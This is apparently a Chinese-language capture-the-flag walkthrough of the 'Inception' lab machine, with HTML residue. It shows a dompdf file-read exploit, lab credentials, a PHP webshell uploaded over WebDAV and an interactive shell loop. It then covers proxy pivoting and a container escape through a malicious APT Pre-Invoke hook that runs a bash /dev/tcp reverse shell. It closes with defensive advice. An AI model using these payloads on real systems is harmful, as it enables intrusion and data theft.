Inception靶机渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 目标识别<\/h3>
目标IP: 10.10.10.67<\/li>
开放端口:
80\/tcp: Apache httpd 2.4.18 (Ubuntu)<\/li>
3128\/tcp: Squid http proxy 3.5.12<\/li> <\/ul> <\/li> <\/ul>
1.2 扫描技术<\/h3>
使用以下命令进行端口扫描和服务识别:<\/p>
ip=<\/span>'10.10.10.67'<\/span>; itf=<\/span>'tun0'<\/span>
<\/span><\/span>if<\/span> nmap -Pn -sn "<\/span>$ip"<\/span> | grep -q "Host is up"<\/span>; then<\/span>
<\/span><\/span>  echo -e "\e[32m[+] Target <\/span>$ip is up, scanning ports...\e[0m"<\/span>
<\/span><\/span>  ports=<\/span>$(<\/span>sudo masscan -p1-65535,U:1-65535 "<\/span>$ip"<\/span> --rate=<\/span>1000<\/span> -e "<\/span>$itf"<\/span> | awk '\/open\/ {print $4}'<\/span> | cut -d '\/'<\/span> -f1 | sort -n | tr '\n'<\/span> ','<\/span> | sed 's\/,$\/\/'<\/span>)<\/span>
<\/span><\/span>  if<\/span> [<\/span> -n "<\/span>$ports"<\/span> ]<\/span>; then<\/span>
<\/span><\/span>    echo -e "\e[34m[+] Open ports found on <\/span>$ip: <\/span>$ports\e[0m"<\/span>
<\/span><\/span>    nmap -Pn -sV -sC -p "<\/span>$ports"<\/span> "<\/span>$ip"<\/span>
<\/span><\/span>  else<\/span>
<\/span><\/span>    echo -e "\e[31m[!] No open ports found on <\/span>$ip.\e[0m"<\/span>
<\/span><\/span>  fi<\/span>
<\/span><\/span>else<\/span>
<\/span><\/span>  echo -e "\e[31m[!] Target <\/span>$ip is unreachable, network is down.\e[0m"<\/span>
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>2. Web应用渗透<\/h2>
2.1 DOM-PDF LFI漏洞利用<\/h3>
发现dompdf组件存在本地文件包含(LFI)漏洞:<\/p>
# 发现dompdf路径<\/span>
<\/span><\/span>feroxbuster -u 'http:\/\/10.10.10.67\/'<\/span>
<\/span><\/span>http:\/\/10.10.10.67\/dompdf\/README.md
<\/span><\/span>http:\/\/10.10.10.67\/dompdf\/VERSION
<\/span><\/span>
<\/span><\/span># 利用LFI读取文件<\/span>
<\/span><\/span>curl 'http:\/\/10.10.10.67\/dompdf\/dompdf.php?input_file=php:\/\/filter\/read=convert.base64-encode\/resource=\/etc\/passwd'<\/span>
<\/span><\/span>
<\/span><\/span># 读取Apache配置文件<\/span>
<\/span><\/span>curl -s 'http:\/\/10.10.10.67\/dompdf\/dompdf.php?input_file=php:\/\/filter\/read=convert.base64-encode\/resource=\/etc\/apache2\/sites-enabled\/000-default.conf'<\/span> | grep -oE '[A-Za-z0-9+\/=]{20,}'<\/span> | tr -d '\n'<\/span> | base64 -d
<\/span><\/span>
<\/span><\/span># 读取WebDAV密码文件<\/span>
<\/span><\/span>curl -s 'http:\/\/10.10.10.67\/dompdf\/dompdf.php?input_file=php:\/\/filter\/read=convert.base64-encode\/resource=\/var\/www\/html\/webdav_test_inception\/webdav.passwd'<\/span> | grep -oE '[A-Za-z0-9+\/=]{20,}'<\/span> | tr -d '\n'<\/span> | base64 -d
<\/span><\/span><\/code><\/pre>获取到WebDAV凭据:<\/p>

用户名: webdav_tester<\/li>
密码: babygurl69<\/li>
<\/ul>
2.2 WebDAV利用<\/h3>
使用davtest测试WebDAV功能并上传webshell:<\/p>
# 测试WebDAV<\/span>
<\/span><\/span>davtest -url http:\/\/10.10.10.67\/webdav_test_inception -auth webdav_tester:babygurl69
<\/span><\/span>
<\/span><\/span># 创建PHP webshell<\/span>
<\/span><\/span>echo '<?php system($_GET[cmd]); ?>'<\/span> > rev.php
<\/span><\/span>
<\/span><\/span># 上传webshell<\/span>
<\/span><\/span>curl -X PUT http:\/\/webdav_tester:babygurl69@10.10.10.67\/webdav_test_inception\/rev.php -d @rev.php
<\/span><\/span><\/code><\/pre>2.3 交互式Webshell<\/h3>
创建交互式shell脚本:<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>URL=<\/span>'http:\/\/webdav_tester:babygurl69@10.10.10.67\/webdav_test_inception\/rev.php?cmd='<\/span>
<\/span><\/span>while<\/span> true; do<\/span>
<\/span><\/span>  read -p "webdav-shell> "<\/span> cmd
<\/span><\/span>  if<\/span> [[<\/span> "<\/span>$cmd"<\/span> ==<\/span> "exit"<\/span> ]]<\/span>; then<\/span>
<\/span><\/span>    echo "[+] Exiting shell..."<\/span>
<\/span><\/span>    break
<\/span><\/span>  fi<\/span>
<\/span><\/span>  encoded_cmd=<\/span>$(<\/span>echo -n "<\/span>$cmd"<\/span> | jq -sRr @uri)<\/span>
<\/span><\/span>  curl -s "<\/span>${<\/span>URL}${<\/span>encoded_cmd}<\/span>"<\/span>
<\/span><\/span>done<\/span>
<\/span><\/span><\/code><\/pre>3. 权限提升<\/h2>
3.1 获取数据库凭据<\/h3>
通过webshell读取WordPress配置文件:<\/p>
cat \/var\/www\/html\/wordpress_4.8.3\/wp-config.php
<\/span><\/span><\/code><\/pre>获取到:<\/p>

用户名: root<\/li>
密码: VwPddNh7xMZyDQoByQL4<\/li>
<\/ul>
3.2 Squid代理利用<\/h3>
使用Squid代理进行SSH连接:<\/p>
proxychains -f .\/proxychains.conf ssh cobb@127.0.0.1
<\/span><\/span><\/code><\/pre>获取user flag:<\/p>
a5b6db2fa5bfe8a677c41ec3b01b2ba6
<\/code><\/pre>
3.3 横向移动<\/h3>
使用动态端口转发:<\/p>
proxychains -f .\/proxychains.conf ssh -D 1080<\/span> cobb@127.0.0.1
<\/span><\/span><\/code><\/pre>通过新代理传输工具:<\/p>
proxychains -f .\/proxychains1080.conf scp pspy64 cobb@127.0.0.1:\/tmp\/pspy64
<\/span><\/span>proxychains -f .\/proxychains1080.conf scp linpeas.sh cobb@127.0.0.1:\/tmp\/linpeas.sh
<\/span><\/span><\/code><\/pre>4. 容器逃逸与宿主权限提升<\/h2>
4.1 C段扫描<\/h3>
从容器内扫描宿主网络:<\/p>
nc -uzv 192.168.0.1 1-65535 2>&1<\/span> | grep -v refused
<\/span><\/span><\/code><\/pre>发现开放服务:<\/p>

21\/tcp: FTP<\/li>
22\/tcp: SSH<\/li>
53\/tcp: DNS<\/li>
<\/ul>
4.2 利用APT Pre-Invoke机制<\/h3>
发现宿主每5分钟运行apt update<\/code>:<\/p>
*\/5 * * * * root apt update 2>&1<\/span> >\/var\/log\/apt\/custom.log
<\/span><\/span><\/code><\/pre>利用TFTP上传利用文件:<\/p>
# 创建APT配置文件<\/span>
<\/span><\/span>cat > \/tmp\/00exp <<EOF
<\/span><\/span><\/span>APT::Update::Pre-Invoke {"\/bin\/bash \/tmp\/rev.sh"}
<\/span><\/span><\/span>EOF<\/span>
<\/span><\/span>
<\/span><\/span># 创建反向shell脚本<\/span>
<\/span><\/span>cat > \/tmp\/rev.sh <<EOF
<\/span><\/span><\/span>#!\/bin\/bash
<\/span><\/span><\/span>bash -i >& \/dev\/tcp\/192.168.0.10\/9911 0>&1
<\/span><\/span><\/span>EOF<\/span>
<\/span><\/span>
<\/span><\/span># 上传文件<\/span>
<\/span><\/span>tftp 192.168.0.1
<\/span><\/span>tftp> put \/tmp\/00exp \/etc\/apt\/apt.conf.d\/00exp
<\/span><\/span>tftp> put \/tmp\/rev.sh \/tmp\/rev.sh
<\/span><\/span><\/code><\/pre>4.3 获取root权限<\/h3>
监听反向shell:<\/p>
nc -lvnp 9911<\/span>
<\/span><\/span><\/code><\/pre>获取root flag:<\/p>
d208effa777aa4489c26d2772723190c
<\/code><\/pre>
5. 关键点总结<\/h2>

DOM-PDF LFI漏洞<\/strong>：通过php:\/\/filter协议读取敏感文件<\/li>
WebDAV利用<\/strong>：通过PUT方法上传webshell获取初始立足点<\/li>
Squid代理利用<\/strong>：通过代理访问内部服务，实现横向移动<\/li>
APT Pre-Invoke机制滥用<\/strong>：利用定时任务和APT配置实现容器逃逸和权限提升<\/li>
TFTP文件传输<\/strong>：在受限环境中上传利用文件<\/li>
<\/ol>
6. 防御建议<\/h2>

及时更新Web组件(如dompdf)到最新版本<\/li>
禁用WebDAV不必要的HTTP方法(PUT\/DELETE等)<\/li>
配置Squid代理的访问控制<\/li>
限制APT配置文件的写入权限<\/li>
监控\/etc\/apt\/apt.conf.d\/目录的变更<\/li>
使用容器隔离技术限制容器内对宿主机的访问<\/li>
<\/ol>